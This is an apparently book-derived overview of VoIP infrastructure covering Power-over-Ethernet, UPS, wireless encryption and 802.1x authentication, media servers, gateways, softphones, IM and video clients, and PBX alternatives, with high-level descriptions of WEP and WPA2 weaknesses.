Power-Supply Infrastructure | VoIP Telephony and Infrastructure

Often overlooked as part of the infrastructure required for secure VoIP is how power issues will be addressed. PBX and PSTN phones run on a common battery system that provides availability for free in the face of a power outage, but VoIP phones and the infrastructure that powers them must be carefully designed to meet equivalent requirements.

Power-over-Ethernet (IEEE 802.3af)

Like the name implies, Power-over-Ethernet (POE) eliminates the need to run a separate power supply to common networking appliances. POE works by injecting power using a switch or special power injector that pushes Direct Current (DC) voltage into the CAT5 cable. POE can be used directly with devices specifically designed for POE or with other DC-powered devices with a converter installed. This converter, called a picker or a tap, diverts the extra voltage from the CAT5 cable and redirects it to a regular power jack.

The major advantage of POE is that it allows greater flexibility in installing networking equipment. Access points can be set up in remote locations that normally would be limited to its proximity to a power outlet. It’s often easier to route cat5 cable outdoors (on an antenna or in a tree, for instance) when only network cable is required. POE is also very popular with supplementary low-power devices, such as IP telephones and webcams, even computers!

POE is regulated by the IEEE 802.3af standard. This standard dictates the device must provide 48 volts of direct current, split over two pairs of a four-pair cable. The maximum current is limited at 350 mA and a maximum load of 16.8 watts. Several vendors have created proprietary (prestandard) implementations of POE, however in most cases newer equipment from these vendors is now available that is compliant with the IEEE standard (although at least one of these vendors now advertises an ability for the client to request a lower or higher amount of current through a proprietary process of negotiation above and beyond specifications within the standard).

To properly address VoIP phone availability concerns using POE, be sure that the power injector, network equipment, and voice servers (and gateways) can all operate on battery power for a sufficient length of time, and consider use of a generator when appropriate.

POE in action is pretty simple. The power source checks to see if the device on the other end of the wire is capable of receiving POE. If it is, the source then checks to see on which pairs of wires the device will accept power. If the device is capable, it will operate in one of two modes, A or B. In mode A, power is sent one way over pins 1 and 2, and is received over pins 3 and 6. In mode B, power is sent over pins 4 and 5 and is received over pins 7 and 8. Although only one mode will be used at a time, a device must be able to use both A or B to be IEEE 802.3af compliant.

UPS

No availability strategy can be considered complete without appropriate use of Uninterruptible Power Supply (UPS) technology. Mission critical equipment such as PBX systems and servers need to be protected from unscheduled power outages and other electrical maladies. Because of the sensitive nature of electronic equipment, safeguards need to be put in place to ensure the safety of this equipment. A UPS protects against several availability threats:

• Power surges When the power on the line is greater than it should be, the UPS acts as a buffer, ensuring that no more power reaches the machine than is supposed to. If a power surge were to occur without a UPS inline, sensitive electronics literally could be zapped out of life.
• Partial loss of power A brownout occurs when the power on the line is less than is required to run an appliance. In many cases a brown out is considered to be more dangerous than a total power failure, as electrical circuitry is very sensitive to power requirements.
• Complete loss of power A blackout occurs when power is completely lost to an area. This is very common during natural disasters, where severe weather may topple the electrical infrastructure of an area. Gas or battery powered UPS systems allow for equipment to continue functioning for a set period of time after the lights have gone out. This is ideal for finicky gear that needs to be completely shut down before going dark, lest system integrity be compromised.

In a call-center environment, downtime to the phone system can be fatal to business. With a properly implemented disaster recovery plan including a network of UPS devices, the phones can continue to work when standard computer systems might not be able to. This may mean the difference between success and doom for some companies.

Energy and Heat Budget Considerations

Given the heat and energy crisis being faced in many data centers due to the rapid increase in equipment densities (without a corresponding decrease in energy efficiency), planning for VoIP availability must include consideration for heat and power capacities in the room where VoIP servers and gateways will be housed. Don’t omit this step only to discover after you’ve deployed that you have no power or cooling headroom for the additional equipment!

Wireless Infrastructure | VoIP Telephony and Infrastructure

Wireless access points and associated infrastructure are similarly considered an extension of the data network. However, the increasing use of VoIP clients within this infrastructure creates several unique security considerations (particularly DoS given that wireless is a shared medium). In addition, wireless VoIP devices in the marketplace have lagged in implementation of the most current wireless encryption recommendations. All this should be taken into consideration in the design and operation of wireless VoIR.

Wireless Encryption: WEP

When wireless networking was first designed, its primary focus was ease of implementation, and certainly not security. As any security expert will tell you, it’s extremely difficult to secure a system after the fact. WEP, the Wired Equivalent Privacy encryption scheme, initially was targeted at preventing theft-of-service and eavesdropping attacks. WEP comes in two major varieties, standard 64-bit and 128-bit encryption. 256-bit and 512-bit implementations exist, but they are not nearly as supported by most vendors. 64-bit WEP uses a 24-bit initialization vector that is added to the 40-bit key itself; combined, they form an RC4 key. 128-bit WEP uses a 104-bit key, added to the 24 bit initialization vector. 128-bit WEP was implemented by vendors once a U.S. government restriction limiting cryptographic technology was lifted.

In August of 2001, Fluhrer, Mantin, and Shamir released a paper dissecting cryptographic weaknesses in WEP’s RC4 algorithm. They had discovered that WEPs 24-bit initialization vectors were not long enough, and repetition in the cipher text existed on busy networks. These so-called weak IVs leaked information about the private key An attacker monitoring encrypted traffic long enough was able to recreate the private key, provided enough packets were gathered. Access Point Vendors responded by releasing hardware that filtered out the weak IVs.

However, in 2004 a hacker named Korek released a new statistical-analysis attack on WEP, which led the way to a whole new series of tools. These new wireless weapons broke WEP using merely IVs, and no longer just IVs were considered weak. On a 64-bit WEP encrypted network, an attacker need gather only around 100,000 IVs to crack in (although more certainly increases the chance of penetration) and only 500,000 to 700,000 for 128-bit WEP. On a home network, it can take days, even weeks to see enough traffic to make cracking the key possible. However, clever attackers discovered a way to stimulate network traffic by replaying encrypted network level packets at the target. By mimicking legitimate network traffic, the target network would respond over and over, causing a flood of network traffic and creating IVs at an accelerated rate. With this new attack, a 128-bit WEP network can be broken in as little as 10 minutes.

Wireless Encryption: WPA2

WPA, WiFi Protected Access, was created to address overwhelming concerns with WEPs inadequacy. WPA uses RC4; however, it uses a 128-bit key appended to a 48-bit initialization vector. This longer key defeats the key recovery attacks made popular against WEP using the Temporal Key Integrity Protocol (TKIP), which changes keys mid-session, on the fly Additionally, the Message Integrity Code (MIC) includes a frame counter in the packet, which prevents the replay attacks that cripple WEP.

WPA2 was the child of the IEEE group, their certified form of 802.111. RC4 was replaced by the favorable AES encryption scheme, which is still considered secure. WPA’s MIC is replaced by CCMP, the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. CCMP checks to see if the MIC sum has been altered, and if it has, will not allow the message through.

Perhaps the most beneficial attribute of WPA2 is its ease of implementation. In most cases, hardware vendors needed only reflash the firmware of their Access Points to allow for WPA2 compatibility.

Although considerably stronger than its older brother, WEP, WPA2 is not without guilt. WPA2 encrypted traffic is still susceptible to dictionary attacks since WPA2 uses a hashing algorithm that can be reproduced. Joshua Wright released a tool called co WPAtty, which is a brute-force cracking tool that takes a list of dictionary words and encrypts them using WPA2s algorithms, one at a time. The encrypted value of each word then is compared against the encrypted value of captured traffic, and if the right password is found, POOF! The packet becomes intelligible.

Although brute-force cracking is not guaranteed to yield results, it leverages a weakness found in almost all security mechanisms—the user. If a user chooses a password that is not strong enough, or uses semipredictable modifications (the use of the number 3 instead of “e”), the network will fall. It is recommended that users install a pass-phrase instead of a traditional password. A pass-phrase longer than eight characters, which includes nonalphanu-meric characters, is much less likely to be discovered by brute-forcing methods. And never, ever, use a dictionary word as a password, as these will often be discovered within minutes using freely available software from the Internet.

When implementing wireless VoIP, always use WPA2 or use an alternative means for protecting the VoIP stream (i.e., media and signaling encryption or IPSEC tunneling). Given the speed with which WEP can be cracked, it’s almost pointless to use it since it adds encryption latency and creates a false sense of security.

Authentication: 802.1x

802.1x is an authentication (and to a lesser extent, authorization) protocol, whereas WEP/WPA are encryption protocols. And although 802.1x can be used on wired networks as well, it is most common today on wireless networks. It acts as an added layer of protection for existing wireless security implementations like WEP or WPA2 by requiring additional authentication to join a network beyond the shared secret associated with the encryption key.

802.1x works by forcing users (or devices) to identify themselves before their traffic is ever allowed onto the network. This happens through the use of the Extensible Authentication Protocol (EAP) framework. EAP orchestrates password negotiation and challenge-response tokens, coordinating the user with the authentication server. 802.1x sticks the EAP traffic inside of Ethernet, instead of over PPP, a much older authentication protocol used all over the Internet. Keep in mind that there are a lot of different EAP methods available, so when you are comparing vendor support for 802.1x in infrastructure and VoIP devices you need to pay careful attention to the specific methods supported.

As soon as the access point, called an authenticator, detects that the link is active, it sends an EAP Request Identity packet to the user requesting access, known as thesupplicant. The user then responds with an EAP Response Identity packet, which the authenticator passes to the authentication server, who grants or denies access (see Figure 1).

 

Figure 1: A Basic 802.1x Implementation for a Wireless Network

Think of the supplicant as the guy trying to get into “Club WLAN” who asks the guy at the door if he’s on the list. The authenticator then flags down the bouncer (authenticationserver) to see if he’s “on the list.” If he is, the bouncer lets him in to party with the rest of the party-packets. If not, it’s to the curb he goes!

Because of its moderately complex nature, 802.1x is not as quick to catch on with home users. The involvement of an authentication server (such as a RADIUS server) puts this technology just out of reach for most. However, 802.1x is ideal for businesses and public hot spots looking for more security than WEP or WPA2 alone provide.

| VoIP Telephony and Infrastructure

Media Servers

The term media server is totally overloaded in the VoIP world (and even more so within the IT industry as a whole). If we restrict ourselves to VoIP-related definitions only, a server so named still could be any of the following:

• Interactive voice response (IVR) server or media slave, possibly running VoiceXML or MRCP
• Signaling Media Server (Media Gateway Controller) to handle call control in Voice/VoIP network
• Call distribution (ACD) for receiving and distributing calls in a contact center
• Conferencing Media Server for voice, video, and other applications
• Text-to-speech server (TTS) for listening to e-mail, for instance
• Automated voice-to-e-mail response system
• Voice or video applications server
• Streaming content server
• Fax-on-demand server

Sure, some of these are similar and can roughly be grouped together, but at best you’ll get this down to semi-overlapping groups that center on two general areas: interactive media services and call or resource control. The point here is that in the VoIP world, we haven’t standardized architectures and naming conventions yet so we are left with technically vague terms like media server, media gateway, and the worst offender, softswitch (a marketing term we will not spend more time on this except to note that it was intended to conjure up the image of a class 5 switch being displaced by a software blob that runs these media servers and media gateways but has become so overloaded that it has completely lost any technical meaning it once may have enjoyed).

Interactive Media Service: Media Servers

On the other hand, there is another kind of media server that actually contains DSP resources that it uses to process speech or video (and perhaps one or more additional form of media). These may be involved with generating and receiving DTMF tones, executing the logic of an IVR system, converting text-to-speech or handling streaming or document content in response to speech or DTMF input. Or it may orchestrate multiway call traffic, conference calls, handle translation between codecs, or even fax processing. Media servers of this class may provide VoiceXML interpretation for interactive, dynamic voice applications.

Call or Resource Control: Media Servers

This class of media server is responsible for managing communications resources at a higher level, such as handling call control while managing media gateways that have DSP and other gateway resources for the actual media manipulation. Most Media Servers support VoIP protocols but are likely also to support others as well, such as digital voice or video trunks, or even analog voice through media gateways. Examples of this kind of media server include call control servers from PBX vendors that control separate gateways, voice processing servers that manage and redirect DSP resources located elsewhere, and call distribution systems that manage off-board call handling resources such as switches and IVR systems.

The H.323 Gatekeeper

This gatekeeper is the manager of one or more gateways, and is responsible for providing address translation (alias to IP address) and access control to VoIP terminals and gateways. A gatekeeper acts as the central authority for other gateways, allowing an administrator to quickly and authoritatively roll out changes across a voice network. Gatekeepers limit the number of calls at a given time on a network by implementing control over a proxy. A gatekeeper works something like this: A user wants to make a call to another user at a different physical location, and his phone registers with a local gateway. The gateway then passes on his call information to the gatekeeper, which acts as a central hub to other gateways and users. The gatekeeper then passes call setup information to the gatekeeper at the other office, which in turn hands it to the appropriate destination gateway, and finally to the desktop of the called party. Many call control media servers include an H.323 gatekeeper.

Registration Servers

In a traditional PSTN or PBX switching system, where each user is at a fixed location, usually tied in place by copper wires, routing calls is (relatively speaking) simple. So-called find-me/follow-me services on PSTN or PBX switches can add PSTN mobility. Forwarding or extension-to-cellular features can increase this sense of mobility, but all these solutions require active user programming or rely on fixed forwarding algorithms and are rooted in the PSTN.

But with VoIP, a user can be geographically located virtually anywhere on the planet (as long as minimum QoS conditions are present). A registration server acts as a point of connection for mobile users. Johnny can log in to the registration server from his hotel room in Amsterdam with an unknown IP address and the registration server will let the gateways know where to route his traffic. That way, Johnny can keep the same phone number no matter where he is physically located. A similar example can be seen with instant messaging networks. A user can log in using his screen name from home and be reachable to the same users as if he had logged in from work. In the H.323 world, registration is a function of a gatekeeper; however, this can be a separate function in the SIP realm.

Redirect Servers

A SIP redirect server acts as the traffic light at the VoIP intersection. Very much like a web page with a redirect tag built in, a redirect server will inform a client if the destination the caller is trying to reach had changed. Armed with the updated information from the redirect server, the client will then rerequest the call using the new destination information. This takes some of the load off proxy servers and improves call routing robustness. In this way, a call can quickly be diverted from a proxy, rather than require the proxy to complete the connection itself.

Media Gateways

A gateway is a device that translates between protocols in general by providing logic and translation between otherwise incompatible interfaces. A voice or media gateway in particular tends to translate between PSTN (trunking) protocols and interfaces and local line protocols and interfaces (though that’s not universally true). In addition, the potential protocols and interfaces that a voice gateway now might support include Ethernet and VoIP protocols as well. The voice gateway could have H.323 phones on one side and an ISDN trunk on the other (both digital) or a VoIP phone on one side and an analog loop to the carrier, or even VoIP on both sides (say, H.323 to the station and SIP trunking to the carrier). The point is that there are literally hundreds of different equipment classes that all fall under the voice gateway moniker and thousands of classes that fall under gateway to begin with.

One class of VoIP media gateway connects traditional analog or digital phone equipment or networks to VoIP equipment or networks. A simple home-user implementation of a VoIP gateway like this is an ATA, or Analog Telephone Adaptor. At a minimum a VoIP media gateway will have both a phone interface (analog or digital) and an Ethernet interface. For an ATA, a regular analog phone is connected to the adaptor, which then translates the signal to digital and passes it back over the Ethernet. Of course, media gateways can get much more complex than this. PBX vendors have split out the line-card cabinet portion of their product and recast it as a media gateway, with the gateway under the control of a media server. IP routing companies have added analog and digital voice/video interfaces to routers and recast them as media gateways. And in many respects these products do contain overlapping functionality even though they may not be equivalent.

Firewalls and Application-Layer Gateways

Within a firewall, special code for handling specific protocols (like ftp, which uses separate control and data paths just like VoIP) provides the logic required for the IP address filtering and translation that must take place for the protocol to pass safely through the firewall. One name for this is the Application Layer Gateway (ALG). Each protocol that passes embedded IP addresses or that operates with separate data (or media) and control streams will require ALG code to successfully pass through a deep-packet-inspection and filtering device. Due to the constantly changing nature of VoIP protocols, ALGs provided by firewall vendors are constantly playing a game of catch-up. And tests of real-time performance under load for ALG solutions may reveal that QoS standards cannot be met with a given ALG solution. This can cause VoIP systems to fail under load across the perimeter and has forced consideration of VoIP application proxies as an alternative.

Application Proxies

A Proxy server acts as a translator for transactions or calls of different types. If Johnny’s phone speaks IAX and Jen’s phone speaks only SIP, the proxy sits between them and translates the message as necessary Even if both sides speak the same protocol, be it HTTP or SIP, there are security or NAT or other boundaries that call for either a proxy or packet manipulation in an Application Layer Gateway (ALG) within a firewall. The benefit of an application proxy is that it can be designed specifically for a protocol (or even a manufacturer’s implementation of a protocol). In addition to allowing boundary traversal, a proxy can also be used as a means of access control, ensuring that a user has the rights to place a call before allowing it to proceed. And the best proxies can even guard against malformed packets and certain types of DoS attacks. Depending on the complexity of your call requirements, a proxy may be integrated into a PBX or Media Server, or it may be an entirely different piece of hardware.

Endpoints (User Agents)

In a phone system, an endpoint on the network was known as a terminal, reflecting the fact that it was a slave to the switch or call-control server. But today’s endpoints may possess much more intelligence, thus in the SIP world the term User Agent is preferred. This could be a hardware IP telephone, a softphone, or any other device or service capable of originating or terminating a communication session directly or as a proxy for the end user.

Softphones

With the advent of VoIP technology, users are able to break free of classical physical restrictions of communication, namely the special-purpose telephone terminal. A softphone is a piece of software that handles voice traffic through a computer using a standard computer speaker and microphone (or improved audio equipment that is connected through an audio or multimedia card). Softphones can emulate the look and feel of a traditional phone, using the familiar key layout of a traditional phone and often even emulating the DTMF sounds you hear when you dial a call. Or it may look more like an instant messaging (IM) client, and act like audio chat added to IM.

In fact, a softphone doesn’t even need a computer microphone or speaker: my favorite doesn’t need to send media through the computer at all in telecommuter mode—it just uses H.323 signaling to tell my media server which PSTN number (or extension) to dial for sending and receiving the audio. This lets me turn any phone into a fully featured clone of my work extension without regard to QoS available to me on my Internet connection.

Because a soft phone resides on a PC, the principle of logically separating voice and data networks is defeated as the PC must reside in both domains. You will need to consider this trade-off as you design appropriate security policy for your VoIP network, although the long-term trends favor voice-data integration, so at best maintaining physical separation can be only a temporary strategy.

Consumer softphones have exploded over the past few years and nothing is hotter than Skype in that space. Skype is the brainchild of the people who brought us the Kazaa file sharing framework. Utilizing peer-to-peer technology and an encrypted signaling and media channel, Skype has proven to be both easy to set up and use securely by end users, while simultaneously being a thorn in the side of network administrators. Because it aggressively jumps past firewalls to create call traffic, it is considered to be a threat by many enterprise security groups.

One of Skype’s major enhancements over instant-messaging-based voice is its superb codec, which is actually better than that used within traditional telephone infrastructure. This provides superior call quality when contacting other Skype users. Another major benefit of Skype is the ability to reach any phone in the PSTN by way of SkypeOut gateways. With its PSTN gateway, Skype has become an attractive alternative for small overseas call centers and other Internet businesses.

Are You Owned?—Consumer Softphone Gotchas

Many consumer-oriented softphones contain advertising software that “phones home” with private user information. Several popular softphones (such as X-Lite) store credentials unencrypted in the Window’s registry even after uninstallation of the pro-gram. Softphones require that PC-based firewalls open a number of high UDP ports as part of the media stream transaction. Additionally, any special permissions that the VoIP application has within the host-based firewall rule set will apply to all applications on that desktop (e.g., peer-to-peer software may use SIP for bypassing security policy prohibitions).

Also consider that malware affecting any other application software on the PC can also interfere with voice communications. The flip-side is also true—malware that affects the VoIP software will affect all other applications on the PC and the data services available to that PC (a separate VoIP phone would not require access to file services, databases, etc).

IM Clients

Instant messaging is perhaps the dominant means of real-time communication on the Internet today. IM’s roots can be traced back to the Internet Relay Chat (IRC) networks, which introduced the chat room concept but did not track online presence and never reached the popularity of IM. Just as IM is the next logical step from IRC, voice chat is the next leap from text-based chat. Most of today’s most popular IM clients have included voice functionality, including AOL’s Instant Messenger, Yahoo! Messenger, and MSN Messenger. Skype took the opposite approach and created a chat client that focuses on voice as the star and text chat as an afterthought. Even Google jumped aboard the IM bandwagon, releasing Google Talk. Let’s take a look at these clients to see what makes them similar, and what makes them different.

AIM, AOL’s IM service, surely wasn’t the first on the scene, but it has the largest base of users. Initially AIM was limited to users of the AOL Internet service, but eventually it was opened up to the Internet as a whole. With the addition of a proprietary voice capability in late 1999, AOL was a VoIP pioneer of sorts. (although voice chat was first available through Mirablis’s ICQ). Yahoo! Chat jumped aboard the voice bandwagon soon after, and Google’s more recent client has included voice from the beginning. In 2005, Yahoo announced interoperability with Google and MSN (who also has a voice chat plug-in for messenger that is also used with its Live Communication Server product). In addition, Microsoft’s popular Outlook e-mail client (and entire Office suite in the case of LCS) can be linked to Microsoft Messenger. Also worth mentioning is the Lotus Domino IM client that competes with Microsoft LCS in the enterprise instant messaging (and presence) space, as well as Jabber, which can be used to tie together both public and private IM services using the XMPP protocol.

Google Talk is the newest comer to the IM game. Though Google Talk is still in its infancy, it stands to succeed due largely to a philosophical stand point, embracing open standards over proprietary voice chat. Google Talk aims to connect many different voice networks over a series of peering arrangements, allowing users to minimize their need to run several IM clients. Like Skype, Google seeks to bridge traditional phone calls with Internet telephony, promising to federate with SIP networks that provide access to an ordinary telephone dial tone. Google recently released a library called libjingle to programmers, allowing them to hack new functionality into Google Talk. It will be interesting to see where Google takes Google Talk in the future.

Video Clients

Most of us can probably think back and recall seeing episodes of The Jetsons when we were younger. Or pictures of the AT&T PicturePhone from the 1964 World’s Fair. Movies have all but promised these devices to be a staple of every day life in the future. And for decades, the video conference has been pushed by enterprises seeking to save money on travel (though investments in video conferencing equipment tend to sit around gathering dust). Live video on the Internet has its adherents, and today we see yet another wave of marketing aimed at the business use of video. So, will video finally take off around VoIP just like audio, or is there something different going on here?

The video phone has been tomorrow’s next big technology for 50 years but the issue has been more sociological than technological. Certainly, popular instant messaging clients have included video chat capabilities for some time now, although each client typically supports only video between other users of the same client or messaging network. And although it always gives me a kick to see someone else announcing that they’ve solved the gap with technology, the point is well taken that video is here to stay in VoIP systems—even if it doesn’t get as much use as VoIP.

The latest on the video bandwagon is the Skype 2.0 release. At only 15 frames per second and 40 to 75 kbps upload and download, Skype Video works well on a standard home DSL line or better. Other popular IM clients with video include Microsoft’s Messenger and Yahoo Instant Messenger. AIM now offers video as well.

H.323-based IP videoconferencing systems have been available in hardware and software from many sources for almost a decade at this point, so there’s no shortage of vendors in this space. And SIP video phones are available from many of these same vendors and from startup companies in the SIP space.

Wireless VoIP Clients

Over the past few years, an explosion of wireless VoIP solutions has hit the marketplace. Most of these solutions are immature and if broadly deployed can completely overrun the available bandwidth on 802.11b (or g) networks that were not engineered for high-density voice, even with QoS prioritization. And although 802.11a networks can handle higher wireless VoIP densities, they present other backward-compatibility issues of their own. And we haven’t even gotten to the security issues yet! Still, the promise of WiFi VoIP is tantalizing, and most enterprises that have deployed VoIP solutions seem to have experimented with it. The idea of a combined cellphone/WiFi phone (and maybe PDA too) seems just too compelling to ignore, even if power consumption issues sideline keep the concept sidelined in the short term.

PBX Alternatives

Long before the appearance of VoIP, nonswitched alternatives to the PBX have been available. For systems of less than 50 users, Key Telephone Systems (KTS) share outside lines directly and have dedicated intercom lines to talk between stations. Current generation key systems are more PBX-like than ever, so it may be hard to find that distinction anymore. But older key systems won’t support advanced switching features like trunk-to-trunk transfer that can lead to toll fraud. Still, so-called hybrid key systems should be treated like a regular PBX when it comes to security.

Centrex, IP Centrex, and Hosted IP-telephony services are carrier-based PBX alternatives that provide a private dial plan plus the more popular switching features that an on-site PBX system might. However, the switching equipment stays in the carrier’s infrastructure and is managed by the carrier. This is a mixed blessing since it’s likely to reduce the overall functionality and access policy tailoring available to you if your organization uses such a service, but it does mean that the carrier shoulders a larger share of the responsibility for any toll fraud that may result (and consequently won’t provide high-risk services like trunk-totrunk dialing without extra security measures).

More recently, the appearance of IP telephony has provided an opportunity for some manufacturers like Avaya to rearchitect their overall PBX approach and separate the functionalityonce provided in a single device into multiple devices. In particular, call control and signaling can be separated from media processing and gateway services; this approach makes possible an architecture where a few call control servers can provide redundant services across an entire organization with media gateways located in every geographic location that contains their physical presence. Well treat this approach along with other similar VoIP architectures

Wireless & Other PBX Solutions

Wireless PBX Solutions

Several solutions for adding wireless extensions to PBX systems have been commercialized. Most PBX vendors have implemented proprietary 900 MHz-band solutions in the United States as well as the 1900 MHz Digital Enhanced Cordless Telecommunications (DECT) ETSI standard in Europe, which has driven widespread adoptions of vendor-neutral wireless there. More recently, a number of WiFi solutions have become available, as well as combination WiFi/GSM solutions that let a single device work with both Cellular and Enterprise PBX infrastructure. 

Other PBX Solutions

Two other PBX solutions with security considerations bear some discussion: Call Detail Recording (CDR) systems and Voice Firewalls. CDR systems enable every call on a PBX to be recorded after it is complete using a standardized format. This allows special reporting software to analyze this data for forensic or diagnostic purposes. It is worth noting, however, that a CDR system will not allow you to stop a fraudulent call still in progress. For this, you would need a voice firewall such as that sold by SecureLogix. Such a firewall allows you to see current calls in real-time, apply policy based on type of call (voice, fax, or data), and set notifications, authentication requirements, or other policy based on rules very similar to those you might set for data traffic on a data firewall.

All PBX systems provide PSTN-like switching services between endpoints and adjuncts, the PSTN, and other private PBX switches (and associated private networks). Only a few of the possible adjunct systems are mentioned here. An ACD is an Automatic Call Distribution server (for use in call centers to direct calls to groups of agents), and an IVR is an Interactive Voice Response server (also commonly used in call centers to let callers use touch tones and voice prompts to select services).

So a PBX could be all IP or all analog or anything in the middle as long as it switches calls between extensions and the PSTN as needed. In the end you will find that despite the marketing hype, most VoIP systems are just PBX systems with different combinations of support for IP lines and trunks. In some cases, the call control part of the system is split out from the gateway that handles the non-IP electrical interfaces. Or it’s pushed out to a service provider. But the basic switching concept is preserved somewhere across the system as a whole. Regardless, understanding basic PBX terminology will help you understand the underlying architecture of the VoIP systems you may encounter, so let’s start there.